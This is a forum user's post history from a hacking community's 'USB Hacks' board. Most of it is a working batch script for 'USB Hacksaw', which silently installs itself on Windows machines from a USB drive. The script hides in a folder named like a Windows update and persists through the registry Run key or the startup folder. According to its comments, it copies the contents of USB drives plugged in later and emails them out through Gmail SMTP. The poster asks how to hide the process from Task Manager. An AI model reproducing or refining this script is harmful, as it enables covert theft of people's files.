Jump to content

brfield

Members
 View Profile  See their activity

  • Posts

    3

  • Joined

  • Last visited

 Content Type 

Posts posted by brfield

    USBhacksaw Help

    in USB Hacks

    Posted

    With hidden "Files and Folders" enabled you will still be screwed. You have to follow this process-I had the same problem:

    Tools-->Folder Options-->uncheck HIDE PROTECTED SYSTEM OPERATING FILES(RECOMMENDED)

    Then edit the send.bat

    USB Hacksaw Development

    in USB Hacks

    Posted

    I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically!

    The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit?

    if exist C:Void.txt GOTO end
::Use /\/\ to keep from infecting yourself
:: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc
:: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss
:: 
:: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently 
:: install on windows 2000, XP, or 2003 machines with either administrator or guest access. 
:: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or
:: startup folder depening on user rights, and start the program.
:: 
:: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will 
:: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the 
:: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper,
:: then silently run the send.bat file located in the same directory, which will then archive the contents 
:: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the 
:: downloaded data to an email address, and remove the documents and archives.
:: 
:: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method
:: for determining user rights and thus installing accordingly was planned, however problems with the 
:: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more
:: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests
:: shouldnt be able to and check errorlevel).
:: 
:: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org
:: Programs used:
:: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml
:: Stunnel -- http://www.stunnel.org/
:: Blat -- http://www.blat.net/
:: Shortcut --  http://www.optimumx.com/download/#Shortcut
:: Rar -- http://www.rarlabs.com/
:: 
:: More information and future developments of this hack can be found at:
:: http://www.hak5.org/wiki/USB_Hacksaw




:: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs
mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"

:: go to payload directory
cd \WIP\SBS

:: remove hidden and system attributes (makes next copy command happy, probably better way to do this)
attrib *.* -s -h

:: copy payload to target
copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"

:: reapply hidden and system attributes
attrib *.* +s +h

:: If admin register USB Hacksaw as startup program in registry, else do it the yucky way
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"

:: Hide USB Hacksaw
attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h

:: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)
:: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe"
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB931337$
sbs.exe

:end

    I have tried:

    exit

    @exit

    taskkill /f /cmd.exe

    exit /b 1

    close

    How can I make it end itself? Make it not seen in Task Manager

×
×
  • Create New...